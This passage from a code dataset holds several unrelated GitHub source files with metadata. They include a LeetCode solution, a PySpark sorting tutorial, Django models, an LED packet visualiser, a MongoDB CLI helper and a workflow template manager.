t.start()","repo_name":"CordTech32/Positron","sub_path":"positron/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71876962088","text":"from typing import List\n\n\nclass Solution:\n    def wordBreak(self, s: str, wordDict: List[str]) -> bool:\n        response = False\n\n        for word in wordDict:\n            if s[:len(word)] == word:\n                n = len(s) // len(word)\n                while n >= 1:\n                    if len(word) * n == len(s) or
response:\n return True\n response = response | self.wordBreak(s[len(word) * n:], wordDict)\n if response:\n return True\n n -= 1\n\n return response\n\n\nsolution = Solution()\nprint(solution.wordBreak(s = \"catskicatcats\", wordDict = [\"cats\",\"cat\",\"dog\",\"ski\"]))","repo_name":"nikpopesku/leetcode","sub_path":"python/100-199/139_word_break.py","file_name":"139_word_break.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36147540752","text":"import lib.definition as proc\nimport numpy as np\nimport pandas as pd\nimport itertools\nfrom lmfit import Model\nimport os, psutil\nimport gc\nimport multiprocessing as mp\nimport csv\nimport random as rand\nfrom scipy.stats import sem\nimport matplotlib.pyplot as plt\n\n\npath = \"/home/jlb1694/data/raw/opt/Run1.lh5\"\nwaves = proc.getWaves(path)\nwave = waves[1096][0:15000]\n\nenergy = 60\ntime = 60\nrise = 6\nflat = 0.8\n\n\nwf_sub = proc.sub_wave(wave[0:15000])\npulse, true_time = proc.get_pulse(energy, time, int(len(wave[0:15000])))\nwp = pulse + wf_sub\n \nw_trap, trap_energy, trap_time = proc.apply_trap(wp, rise, flat)\n\nm90 = trap_energy*0.9\nm10 = trap_energy*0.1\nm50 = trap_energy*0.5\nimax51 = proc.find_idx(wp, m50, trap_time)\nimax9 = proc.find_idxr(wp, m90, imax51)\nimax1 = proc.find_idx(wp, m10, imax51)\n \n \nrise_cal = imax9 - imax1\ndelT = abs(rise_cal - true_time)\n\nprint(delT)\nprint(true_time)\nprint(rise_cal)\nprint(trap_energy)\nprint(imax51)\nprint(trap_time)\n\nplt.plot(wp)\nplt.plot(w_trap)\nplt.axvline(imax51, color = 'g')\nplt.axvline(imax9, color = 'r')\nplt.axvline(imax1, color = 'b')\nplt.show()","repo_name":"jbrowni2/TimeEnergyStudy","sub_path":"testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36719849077","text":"\"\"\"\nhttps://sparkbyexamples.com/pyspark/pyspark-orderby-and-sort-explained/\n\nhttps://github.com/spark-examples/pyspark-examples/blob/master/pyspark-orderby.py\n\n3 ways to sort\n\nsort()\n\norderBy()\n\nRawSQL\n\n\nDataFrame.sort() default ascending, support multiple column\n\nsame usage provide by DataFrame.orderBy()\n\nspecifically assgin ascending/decending\n\ndf.sort(df.department.asc() / .desc() )\n\nAlso support Raw SQL\n\n\"\"\"\n\nimport pyspark\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import col, asc, desc\n\nspark = SparkSession.builder.appName(\"SparkByExamples.com\").getOrCreate()\n\nsimpleData = [\n (\"James\", \"Sales\", \"NY\", 90000, 34, 10000),\n (\"Michael\", \"Sales\", \"NY\", 86000, 56, 20000),\n (\"Robert\", \"Sales\", \"CA\", 81000, 30, 23000),\n (\"Maria\", \"Finance\", \"CA\", 90000, 24, 23000),\n (\"Raman\", \"Finance\", \"CA\", 99000, 40, 24000),\n (\"Scott\", \"Finance\", \"NY\", 83000, 36, 19000),\n (\"Jen\", \"Finance\", \"NY\", 79000, 53, 15000),\n (\"Jeff\", \"Marketing\", \"CA\", 80000, 25, 18000),\n (\"Kumar\", \"Marketing\", \"NY\", 91000, 50, 21000),\n]\ncolumns = [\"employee_name\", \"department\", \"state\", \"salary\", \"age\", \"bonus\"]\n\ndf = spark.createDataFrame(data=simpleData, schema=columns)\n\ndf.printSchema()\ndf.show(truncate=False)\n\ndf.sort(\"department\", \"state\").show(truncate=False)\ndf.sort(col(\"department\"), col(\"state\")).show(truncate=False)\n\ndf.orderBy(\"department\", \"state\").show(truncate=False)\ndf.orderBy(col(\"department\"), 
col(\"state\")).show(truncate=False)\n\n# assign ascending or descending\ndf.sort(df.department.asc(), df.state.asc()).show(truncate=False)\ndf.sort(col(\"department\").asc(), col(\"state\").asc()).show(truncate=False)\ndf.orderBy(col(\"department\").asc(), col(\"state\").asc()).show(truncate=False)\n\ndf.sort(df.department.asc(), df.state.desc()).show(truncate=False)\ndf.sort(col(\"department\").asc(), col(\"state\").desc()).show(truncate=False)\ndf.orderBy(col(\"department\").asc(), col(\"state\").desc()).show(truncate=False)\n\n\ndf.createOrReplaceTempView(\"EMP\")\ndf.select(\n \"employee_name\", asc(\"department\"), desc(\"state\"), \"salary\", \"age\", \"bonus\"\n).show(truncate=False)\n\nspark.sql(\n \"select employee_name,department,state,salary,age,bonus from EMP ORDER BY department asc\"\n).show(truncate=False)\n","repo_name":"YLTsai0609/pyspark_101","sub_path":"d013_orderby_vs_sort.py","file_name":"d013_orderby_vs_sort.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"40761434089","text":"import datetime\n\nfrom django.db import models\nfrom django.utils import timezone\nfrom django.contrib import admin\n\n\nclass Participant(models.Model):\n participant_name = models.CharField('Jméno', max_length=50)\n\n def __str__(self):\n return self.participant_name\n\n class Meta:\n verbose_name_plural = \"Účastníci\"\n\n\nclass Tag(models.Model):\n tag_title = models.CharField('Tag', max_length=30)\n\n def __str__(self):\n return self.tag_title\n\n class Meta:\n verbose_name_plural = \"Tagy\"\n\n\nclass Type(models.Model):\n type_of_record = models.CharField(max_length=50)\n\n def __str__(self):\n return self.type_of_record\n\n class Meta:\n verbose_name_plural = \"Typy\"\n\n\nclass Record(models.Model):\n title = models.CharField('Název', max_length=150)\n pub_date = models.DateTimeField('Vloženo')\n start_date = models.DateField('Začátek')\n end_date = models.DateField('Konec')\n milestone = models.CharField('Milník', max_length=150)\n description = models.CharField('Popis', max_length=1000)\n type = models.ForeignKey(Type, on_delete=models.SET_NULL, null=True, verbose_name=\"Typ\")\n participants = models.ManyToManyField(Participant, verbose_name=\"Účastníci\")\n tags = models.ManyToManyField(Tag, verbose_name=\"Tagy\")\n\n def __init__(self, *args, **kwargs):\n super(Record, self).__init__(*args, **kwargs)\n\n def __str__(self):\n\n return self.title\n\n class Meta:\n verbose_name_plural = \"Záznamy\"\n\n @admin.display(\n boolean=True,\n ordering='pub_date',\n description='Publikováno nedávno?',\n )\n def was_published_recently(self):\n now = timezone.now()\n return now - datetime.timedelta(days=7) <= self.pub_date <= now\n\n\n","repo_name":"OndraPavlovic/web_app-Chronicle","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2656610356","text":"import threading\nimport time\nimport pyttsx3\nfrom numpy import char\nimport multiprocessing\nimport os\nevent = multiprocessing.Event()\ncount = 0\ndef lighter(q):\n\n#flag=True: 青信号\n#flag=False: 赤信号\n\n global count\n #event.set() # 初期値は青信号\n q.put(False)\n while True:\n\n \n count += 1\n print(count)\n check(q)\n time.sleep(1)\n\n\ndef check():\n global count\n if 5 10:\n #event.set() #青信号\n #car2.start()\n count = 0\n return True\n else:\n print(\"\\33[42;1m青信号...\\033[0m\")\n return 
True\n \n\n\n #time.sleep(1)\n\n\ndef car():\n engine = pyttsx3.init()\n #rate デフォルト値は200\n rate = engine.getProperty('rate')\n engine.setProperty('rate',300)\n\n #volume デフォルト値は1.0、設定は0.0~1.0\n volume = engine.getProperty('volume')\n engine.setProperty('volume',1.0)\n while True:\n st = q.get()\n if st == True:\n p2 = multiprocessing.Process(target=sayfunc,args=(\"とまれとまれとまれとまれとまれとまれとまれとまれとまれとまれとまれ\",))\n p2.start()\n else:\n p2 = multiprocessing.Process(target=sayfunc,args=(\"すすめ\",))\n p2.start()\n print(\"赤から青\")\n print(st)\n time.sleep(1)\n engine.say(name)\n engine.runAndWait()\n \n #engine.endLoop()\n\ndef sayfunc(q,ph):\n engine = q.get()\n #engine = pyttsx3.init()\n #rate デフォルト値は200\n engine.say(ph)\n engine.runAndWait()\n q.put(False)\n\n\ndef say(ph):\n engine = pyttsx3.init()\n #rate デフォルト値は200\n rate = engine.getProperty('rate')\n engine.setProperty('rate',200)\n volume = engine.getProperty('volume')\n engine.setProperty('volume',1.0)\n engine.say(ph)\n engine.runAndWait()\n\n\nif __name__ == '__main__':\n q = multiprocessing.Queue()\n engine = pyttsx3.init()\n #engine = pyttsx3.init()\n #rate デフォルト値は200\n rate = engine.getProperty('rate')\n engine.setProperty('rate',300)\n volume = engine.getProperty('volume')\n engine.setProperty('volume',3.0)\n #rate デフォルト値は200\n q.put(engine)\n while True:\n count +=1\n print(count)\n judge = check()\n \n \n if judge == True:\n st = q.get()\n print(st)\n #print(len(q))\n if st == engine:\n engine.stop()\n voice1.terminate()\n voice1 = multiprocessing.Process(target=sayfunc,args=(q,\"あの客はよく柿食う客だ\"))\n voice1.start()\n q.put(engine)\n else:\n st = q.get()\n if st == engine:\n engine.stop()\n voice1.terminate()\n \n voice1 = multiprocessing.Process(target=sayfunc,args=(q,\"go\"))\n voice1.start()\n q.put(engine)\n time.sleep(2)\n#car = threading.Thread(target=car, args=(\"MINI\",))\n#car.start()","repo_name":"Naoya-Tagawa/3dprinter_visual_impaired","sub_path":"ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":3338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11852991429","text":"# Author: Nima Daryabar\n# Making a database using pymongo\nfrom pymongo import MongoClient\nimport re\n\nfrom src.validation.regcheck import check_only_letters\nfrom src.validation.regcheck import digit_check\n\n\n# Show databases list\n# db_client: client from connect_db()\n# db_list: list of databases as return value\ndef db_list(db_client):\n print(\"\\ndatabases list:\\n\")\n db_list = db_client.list_database_names() # Get list of databases\n\n # Check if collection list is empty or not to show it to the user\n if not db_list: # if no database\n print(\"\\n-> There is no database to show!\")\n else:\n for counter, dbname in enumerate(db_list, 1):\n print(counter, '.', dbname)\n return db_list\n\n\n# Create new datbase\n# dbls_list: database list from connect_db()\n# dbls_client: client from connect_db()\ndef create_db(dbls_list, dbls_client):\n is_new_db = True # True if new db is created\n while True: # Check if name exists or not\n\n # Getting database name from user\n while True: # Check if name is only letters\n db_name_user = input('\\nGive a database name to create one: ')\n\n # check if name is only letters\n if check_only_letters(db_name_user): # if True\n break\n else:\n print(\"\\n -> only letters is allowed\")\n\n \n if db_name_user in dbls_list: # if database name is in the list\n print(\"\\n-> The database is already created! 
Enter New name plz!\")\n\n else: # if database name is not in the list\n created_db = dbls_client[db_name_user] # Create database\n print(\"\\nDatabase is created\")\n break \n return created_db, is_new_db\n\n\n# Choose one database from databases list\n# rdb_db_list: database list from connect_db()\n# rdb_client: client from connect_db()\ndef retrieve_db(rdb_client, rdb_db_list):\n while True: # Check if user enters correct number\n\n # Check and get user's given number\n print(\"\\nEnter database list number:\", end=' ')\n db_list_num = digit_check()\n \n # Check if number is in the range of db_list length\n if db_list_num == 0:\n print(\"Wrong number! again plz!\")\n continue\n if db_list_num in range((len(rdb_db_list)+1)): # if number is in the range\n break # break from loop\n else:\n print(\"Wrong number! plz enter a number in a range of 1 to \", len(rdb_db_list))\n \n print(rdb_db_list[(db_list_num-1)]) # show choosen database from list\n choosen_db = rdb_db_list[(db_list_num-1)] # choose from database list\n retrieved_db = rdb_client[choosen_db] # return and store choosen database \n return retrieved_db\n\n\n# Connecting to the database\ndef connect_db():\n client = MongoClient('localhost', 27017) # Running Mongod instance\n database_list = db_list(client) # Show databases list\n\n # Turn to True if user makes a new database\n new_db = False\n\n # Check if there is any db in db_list to make a new database or not\n if not database_list: # if no database in database list\n print(\"\\nCreate a database to continue\")\n db, new_db = create_db(database_list, client) # Create a new database\n\n else: # if there is db in database list\n while True: # Ask to make a new database or use one from the list\n answer_new_or_list = input(\"\\nMaking new datbase(n) or Using one from list(l) - (n/l): \")\n \n if answer_new_or_list == 'n': # Making a new databse\n db, new_db = create_db(database_list, client) # Create new database\n break\n \n elif answer_new_or_list == 'l': # Using db from old databases in the list\n db = retrieve_db(client, database_list) # Choose one from db list\n break\n\n \n else: # Wrong answer to the question\n print(\"\\n*Wrong answer, Enter again plz!\")\n return db, new_db\n\n\nif __name__ == \"__main__\":\n conn = connect_db()\n","repo_name":"nimad70/Infostorage","sub_path":"src/database/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":4034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26525940637","text":"import traceback\n\nfrom pipeline.exceptions import PipelineException\n\nfrom gcloud.constants import TEMPLATE_NODE_NAME_MAX_LENGTH\nfrom gcloud.template_base.utils import replace_template_id\nfrom gcloud.utils.strings import standardize_name, standardize_pipeline_node_name\n\nfrom pipeline.models import PipelineTemplate, TemplateRelationship\nfrom pipeline_web.core.models import NodeInTemplate\nfrom pipeline_web.parser.validator import validate_web_pipeline_tree\nfrom pipeline_web.parser.clean import PipelineWebTreeCleaner\nfrom django.utils.translation import ugettext_lazy as _\nimport logging\n\nlogger = logging.getLogger(\"root\")\n\n\nclass TemplateManager:\n def __init__(self, template_model_cls):\n self.template_model_cls = template_model_cls\n\n def create_pipeline(self, name: str, creator: str, pipeline_tree: dict, description: str = \"\",) -> dict:\n \"\"\"\n 创建 pipeline 层模板\n\n :param name: 模板名\n :type name: str\n :param creator: 创建者\n :type creator: str\n :param pipeline_tree: 
模板数据\n :type pipeline_tree: dict\n :param description: 模板描述, defaults to \"\"\n :type description: str, optional\n :return: [description]\n :rtype: dict\n \"\"\"\n name = standardize_name(name, TEMPLATE_NODE_NAME_MAX_LENGTH)\n standardize_pipeline_node_name(pipeline_tree)\n\n try:\n validate_web_pipeline_tree(pipeline_tree)\n except PipelineException as e:\n message = _(f\"保存流程失败: 流程树合法性校验失败, 请检查流程. 失败原因: {e} | create_pipeline\")\n logger.error(message)\n return {\n \"result\": False,\n \"data\": None,\n \"message\": message,\n \"verbose_message\": _(f\"保存流程失败: 流程树合法性校验失败, 请检查流程. 失败原因: {traceback.format_exc()} | create_pipeline\"),\n }\n\n create_template_kwargs = {\n \"name\": name,\n \"creator\": creator,\n \"pipeline_tree\": pipeline_tree,\n \"description\": description,\n }\n try:\n pipeline_template = self.template_model_cls.objects.create_pipeline_template(**create_template_kwargs)\n except Exception as e:\n message = _(f\"保存流程失败: 创建Pipeline流程失败, 请检查流程. 创建参数[{create_template_kwargs}], 失败原因: [{e}] | create_pipeline\")\n logger.error(message)\n return {\n \"result\": False,\n \"data\": None,\n \"message\": message,\n \"verbose_message\": _(\n f\"保存流程失败: 创建Pipeline流程失败, 请检查流程. \"\n f\"创建参数[{create_template_kwargs}], 失败原因: [{traceback.format_exc()}] | create_pipeline\"\n ),\n }\n\n return {\"result\": True, \"data\": pipeline_template, \"message\": \"success\", \"verbose_message\": \"success\"}\n\n def create(\n self, name: str, creator: str, pipeline_tree: dict, template_kwargs: dict, description: str = \"\",\n ) -> dict:\n \"\"\"\n 创建 template 层模板\n\n :param name: 模板名\n :type name: str\n :param creator: 创建者\n :type creator: str\n :param pipeline_tree: 模板数据\n :type pipeline_tree: dict\n :param template_kwargs: template 层参数\n :type template_kwargs: dict\n :param description: 描述, defaults to \"\"\n :type description: str, optional\n :return: [description]\n :rtype: dict\n \"\"\"\n create_result = self.create_pipeline(\n name=name, creator=creator, pipeline_tree=pipeline_tree, description=description\n )\n if not create_result[\"result\"]:\n return create_result\n\n template_kwargs[\"pipeline_template_id\"] = create_result[\"data\"].template_id\n try:\n template = self.template_model_cls.objects.create(**template_kwargs)\n except Exception as e:\n message = _(f\"保存流程失败: 创建模板失败, 请检查流程. 创建参数[{template_kwargs}], 失败原因: [{e}] | create\")\n logger.error(message)\n return {\n \"result\": False,\n \"data\": None,\n \"message\": message,\n \"verbose_message\": _(\n f\"保存流程失败: 创建模板失败, 请检查流程. 
创建参数[{template_kwargs}], 失败原因: [{traceback.format_exc()}] | create\"\n ),\n }\n\n return {\"result\": True, \"data\": template, \"message\": \"success\", \"verbose_message\": \"success\"}\n\n def update_pipeline(\n self,\n pipeline_template: PipelineTemplate,\n editor: str,\n name: str = \"\",\n pipeline_tree: str = None,\n description: str = \"\",\n ) -> dict:\n \"\"\"\n 更新 pipeline 层模板\n\n :param pipeline_template: pipeline 模板对象\n :type pipeline_template: PipelineTemplate\n :param editor: 编辑者\n :type editor: str\n :param name: 模板名, defaults to \"\"\n :type name: str, optional\n :param pipeline_tree: 模板结构, defaults to None\n :type pipeline_tree: str, optional\n :param description: 模板描述, defaults to \"\"\n :type description: str, optional\n :return: [description]\n :rtype: dict\n \"\"\"\n update_kwargs = {\"editor\": editor}\n if name:\n update_kwargs[\"name\"] = standardize_name(name, TEMPLATE_NODE_NAME_MAX_LENGTH)\n\n if description:\n update_kwargs[\"description\"] = description\n\n if pipeline_tree:\n standardize_pipeline_node_name(pipeline_tree)\n try:\n validate_web_pipeline_tree(pipeline_tree)\n except PipelineException as e:\n message = _(f\"保存流程失败: 流程树合法性校验失败, 请检查流程. 失败原因: {e} | update_pipeline\")\n logger.error(message)\n return {\n \"result\": False,\n \"data\": None,\n \"message\": message,\n \"verbose_message\": _(\n f\"保存流程失败: 流程树合法性校验失败, 请检查流程. 失败原因: {traceback.format_exc()} | update_pipeline\"\n ),\n }\n\n replace_template_id(self.template_model_cls, pipeline_tree)\n\n pipeline_web_tree = PipelineWebTreeCleaner(pipeline_tree)\n pipeline_web_tree.clean()\n update_kwargs[\"structure_data\"] = pipeline_tree\n\n try:\n pipeline_template.update_template(**update_kwargs)\n except Exception as e:\n message = _(f\"更新流程失败: 更新Pipeline失败, 请检查流程. 更新参数: [{update_kwargs}], 失败原因: [{e}] | update_pipeline\")\n logger.error(message)\n return {\n \"result\": False,\n \"data\": None,\n \"message\": message,\n \"verbose_message\": _(\n f\"更新流程失败: 更新Pipeline失败, 请检查流程. 
更新参数: [{update_kwargs}], 失败原因: [{traceback.format_exc()}\"\n ),\n }\n\n # create node in template\n NodeInTemplate.objects.update_nodes_in_template(pipeline_template, pipeline_web_tree.origin_data)\n else:\n for k, v in update_kwargs.items():\n setattr(pipeline_template, k, v)\n pipeline_template.save()\n\n return {\"result\": True, \"data\": pipeline_template, \"message\": \"success\", \"verbose_message\": \"success\"}\n\n def update(\n self, template: object, editor: str, name: str = \"\", pipeline_tree: str = None, description: str = \"\",\n ) -> dict:\n \"\"\"\n 更新 template 层模板\n\n :param template: template 对象\n :type template: object\n :param editor: 编辑者\n :type editor: str\n :param name: 模板名, defaults to \"\"\n :type name: str, optional\n :param pipeline_tree: 模板结构, defaults to None\n :type pipeline_tree: str, optional\n :param description: 模板描述, defaults to \"\"\n :type description: str, optional\n :return: [description]\n :rtype: dict\n \"\"\"\n data = self.update_pipeline(\n pipeline_template=template.pipeline_template,\n editor=editor,\n name=name,\n pipeline_tree=pipeline_tree,\n description=description,\n )\n if not data[\"result\"]:\n return data\n\n data[\"data\"] = template\n return data\n\n def can_delete(self, template: object) -> (bool, str):\n \"\"\"\n 检测 template 是否能够删除\n\n :param self: [description]\n :type self: [type]\n :param str: [description]\n :type str: [type]\n :return: [description]\n :rtype: [type]\n \"\"\"\n referencer = template.referencer()\n if referencer:\n message = _(\n \"流程删除失败: 流程已被其他流程引用[{}], 暂不可删除, 请处理后重试 | can_delete\".format(\n \",\".join([f'{item[\"template_type\"]}:{item[\"id\"]}:{item[\"name\"]}' for item in referencer])\n )\n )\n logger.error(message)\n return (\n False,\n message,\n )\n\n appmaker_referencer = template.referencer_appmaker()\n if appmaker_referencer:\n message = _(\n \"流程删除失败: 流程已被其他轻应用引用[{}], 暂不可删除, 请处理后重试 | can_delete\".format(\n \",\".join([f'{item[\"id\"]}:{item[\"name\"]}' for item in appmaker_referencer])\n )\n )\n logger.error(message)\n return (\n False,\n message,\n )\n\n clocked_task_referencer = template.referencer_clocked_task()\n if clocked_task_referencer:\n message = _(\n \"流程删除失败: 流程已被其他计划任务引用[{}], 暂不可删除, 请处理后重试 | can_delete\".format(\n \",\".join([f'{item[\"id\"]}:{item[\"name\"]}' for item in clocked_task_referencer])\n )\n )\n logger.error(message)\n return (\n False,\n message,\n )\n\n periodic_task_referencer = template.referencer_periodic_task()\n if periodic_task_referencer:\n message = _(\n \"流程删除失败: 流程已被其他周期任务引用[{}], 暂不可删除, 请处理后重试 | can_delete\".format(\n \",\".join([f'{item[\"id\"]}:{item[\"name\"]}' for item in periodic_task_referencer])\n )\n )\n logger.error(message)\n return (\n False,\n message,\n )\n\n return True, \"\"\n\n def delete(self, template: object) -> dict:\n \"\"\"\n 删除某个 template\n\n :param template: template 对象\n :type template: object\n :return: [description]\n :rtype: dict\n \"\"\"\n can_delete, message = self.can_delete(template)\n if not can_delete:\n return {\"result\": False, \"data\": None, \"message\": message, \"verbose_message\": message}\n\n self.template_model_cls.objects.filter(id=template.id).update(is_deleted=True)\n return {\"result\": True, \"data\": template, \"message\": \"success\", \"verbose_message\": \"success\"}\n\n def batch_delete(self, template_ids: list) -> dict:\n \"\"\"\n 批量删除 template\n\n :param template_ids: template id列表\n :type: list\n :return: [description]\n :rtype: dict\n \"\"\"\n templates = 
self.template_model_cls.objects.select_related(\"pipeline_template\").filter(id__in=template_ids)\n delete_list = []\n not_delete_list = []\n delete_pipeline_template_id_list = []\n references = {}\n for template in templates:\n referencer = template.referencer()\n referencer = [item for item in referencer if item[\"id\"] not in template_ids]\n if referencer:\n references.setdefault(template.id, {}).setdefault(\"template\", []).extend(referencer)\n appmaker_referencer = template.referencer_appmaker()\n if appmaker_referencer:\n references.setdefault(template.id, {}).setdefault(\"appmaker\", []).extend(appmaker_referencer)\n clocked_task_referencer = template.referencer_clocked_task()\n if clocked_task_referencer:\n references.setdefault(template.id, {}).setdefault(\"clocked_task\", []).extend(clocked_task_referencer)\n periodic_task_referencer = template.referencer_periodic_task()\n if periodic_task_referencer:\n references.setdefault(template.id, {}).setdefault(\"periodic_task\", []).extend(periodic_task_referencer)\n if referencer or appmaker_referencer or clocked_task_referencer or periodic_task_referencer:\n not_delete_list.append(template.id)\n else:\n delete_pipeline_template_id_list.append(template.pipeline_template.template_id)\n delete_list.append(template.id)\n\n # 删除该流程引用的子流程节点的执行方案\n relation_queryset = TemplateRelationship.objects.filter(\n ancestor_template_id__in=delete_pipeline_template_id_list\n )\n for relation in relation_queryset:\n relation.templatescheme_set.clear()\n\n self.template_model_cls.objects.filter(id__in=delete_list).update(is_deleted=True)\n return {\n \"result\": True,\n \"data\": {\"success\": delete_list, \"fail\": not_delete_list, \"references\": references},\n \"message\": \"\",\n }\n","repo_name":"TencentBlueKing/bk-sops","sub_path":"gcloud/template_base/domains/template_manager.py","file_name":"template_manager.py","file_ext":"py","file_size_in_byte":14106,"program_lang":"python","lang":"en","doc_type":"code","stars":1001,"dataset":"github-code","pt":"53"} +{"seq_id":"17073224194","text":"# Example using PIO to drive a set of WS2812 LEDs.\r\n\r\nimport array, time\r\nfrom machine import Pin, UART\r\nimport rp2\r\n\r\n# Configure the number of WS2812 LEDs.\r\nNUM_LEDS = 13\r\nPIN_NUM = 7\r\nbrightness = 1.0\r\nseparator = [5, 4, 3, 1]\r\nuart = UART(0, baudrate=9600, tx=Pin(16), rx=Pin(17), timeout=10)\r\nrxData = bytes()\r\nFILTER = [b'0', b'1', b'2', b'3', b'4', b'5', b'6', b'7', b'8', b'9']\r\n\r\n@rp2.asm_pio(sideset_init=rp2.PIO.OUT_LOW, out_shiftdir=rp2.PIO.SHIFT_LEFT, autopull=True, pull_thresh=24)\r\ndef ws2812():\r\n T1 = 2\r\n T2 = 5\r\n T3 = 3\r\n wrap_target()\r\n label(\"bitloop\")\r\n out(x, 1) .side(0) [T3 - 1]\r\n jmp(not_x, \"do_zero\") .side(1) [T1 - 1]\r\n jmp(\"bitloop\") .side(1) [T2 - 1]\r\n label(\"do_zero\")\r\n nop() .side(0) [T2 - 1]\r\n wrap()\r\n\r\n\r\n# Create the StateMachine with the ws2812 program, outputting on pin\r\nsm = rp2.StateMachine(0, ws2812, freq=8_000_000, sideset_base=Pin(PIN_NUM))\r\n\r\n# Start the StateMachine, it will wait for data on its FIFO.\r\nsm.active(1)\r\n\r\n# Display a pattern on the LEDs via an array of LED RGB values.\r\nar = array.array(\"I\", [0 for _ in range(NUM_LEDS)])\r\n\r\n##########################################################################\r\ndef pixels_show():\r\n dimmer_ar = array.array(\"I\", [0 for _ in range(NUM_LEDS)])\r\n for i,c in enumerate(ar):\r\n r = int(((c >> 8) & 0xFF) * brightness)\r\n g = int(((c >> 16) & 0xFF) * brightness)\r\n b = int((c & 0xFF) * 
brightness)\r\n dimmer_ar[i] = (g<<16) + (r<<8) + b\r\n sm.put(dimmer_ar, 8)\r\n\r\ndef pixels_set(i, color):\r\n ar[i] = (color[1]<<16) + (color[0]<<8) + color[2]\r\n\r\ndef pixels_fill(color):\r\n for i in range(len(ar)):\r\n pixels_set(i, color)\r\n\r\ndef color_chase(color, wait):\r\n for i in range(NUM_LEDS):\r\n pixels_set(i, color)\r\n time.sleep(wait)\r\n pixels_show()\r\n time.sleep(0.2)\r\n \r\ndef wheel(pos):\r\n # Input a value 0 to 255 to get a color value.\r\n # The colours are a transition r - g - b - back to r.\r\n if pos < 0 or pos > 255:\r\n return (0, 0, 0)\r\n if pos < 85:\r\n return (255 - pos * 3, pos * 3, 0)\r\n if pos < 170:\r\n pos -= 85\r\n return (0, 255 - pos * 3, pos * 3)\r\n pos -= 170\r\n return (pos * 3, 0, 255 - pos * 3)\r\n \r\n \r\ndef rainbow_cycle(wait):\r\n for j in range(255):\r\n for i in range(NUM_LEDS):\r\n rc_index = (i * 256 // NUM_LEDS) + j\r\n pixels_set(i, wheel(rc_index & 255))\r\n pixels_show()\r\n time.sleep(wait)\r\n\r\ndef light_up_sections(separator, direction, color):\r\n if direction == 0:\r\n start_index = 0\r\n for section_length in separator:\r\n end_index = start_index + section_length\r\n for i in range(start_index, end_index):\r\n pixels_set(i, color)\r\n pixels_show()\r\n\r\n time.sleep_ms(80)\r\n\r\n for i in range(start_index, end_index):\r\n pixels_set(i, BLACK)\r\n pixels_show()\r\n\r\n start_index = end_index\r\n elif direction == 1:\r\n start_index = NUM_LEDS\r\n for section_length in reversed(separator):\r\n start_index -= section_length\r\n end_index = start_index + section_length\r\n for i in range(start_index, end_index):\r\n pixels_set(i, color)\r\n pixels_show()\r\n\r\n time.sleep_ms(80)\r\n\r\n for i in range(start_index, end_index):\r\n pixels_set(i, BLACK)\r\n pixels_show()\r\n\r\nWHITE = (255, 255, 255)\r\nGREEN = (136, 0, 0)\r\nRED = (0, 255, 0)\r\nBLUE = (0, 0, 255)\r\nPURPLE = (128, 0, 128)\r\nPINK = (255, 192, 203)\r\nYELLOW = (255, 255, 0)\r\nORANGE = (255, 165, 0)\r\nCYAN = (0, 156, 209)\r\nLIME = (0, 255, 0)\r\nGRAY = (136, 136, 136)\r\nBLACK = (0, 0, 0)\r\n\r\n# 0 White others\r\n# 1 Red Anomaly\r\n# 2 Green LLDP\r\n# 3 Lime DNS\r\n# 4 Pink ICMP\r\n# 5 Cyan DHCP\r\n# 6 Purple ARP\r\n# 7 Orange IGMP\r\n# 8 Yellow UDP\r\n# 9 Blue TCP\r\nPACKETS = (WHITE, RED, GREEN, LIME, PINK, CYAN, PURPLE, ORANGE, YELLOW, BLUE)\r\n\r\nlight_up_sections(separator, 0, WHITE)\r\n\r\nwhile True:\r\n rxData = uart.readline()\r\n if rxData is not None:\r\n direction = int(rxData[0])\r\n color = int(rxData[1])\r\n if color >= 0 and color <= 9:\r\n light_up_sections(separator, direction, PACKETS[color])\r\n","repo_name":"yumekiti/illumi-packet_for_wifi","sub_path":"wifi.py","file_name":"wifi.py","file_ext":"py","file_size_in_byte":4327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28575895487","text":"#BIBLIOTECAS\nimport tkinter as tk\nimport json\nimport pygame\nfrom pygame import mixer\nfrom threading import Timer\nimport time\nimport threading\nfrom serial import Serial\nfrom threading import Thread, Timer\nfrom time import sleep\nimport cv2\n\n#meu_serial = Serial(\"COM14\", baudrate=9600)\n\ndef matrizInv(m):\n mInv=[]\n i=0\n j=0\n while j<8:\n mInv.append([])\n while i<5:\n mInv[j].append(m[i][j])\n i+=1\n i=0\n j+=1\n return mInv\n\ndef matrizLuzes(mInv):\n mLuzes=[]\n i=0\n while i=TAMANHO_BOLINHA:\n coordx=(x-50)//50\n coordy=(y-50)//50\n if coordx<=7 and coordy<=4 and coordx>=0 and coordy>=0:\n 
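            # Map a detected blob's pixel position to a board cell: the grid is
            # drawn with a 50 px margin and 50 px cells, so a blob at pixel (x, y)
            # lands in column (x - 50) // 50 and row (y - 50) // 50, and the bounds
            # check above keeps the detection inside the 8x5 board held in `matriz`.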
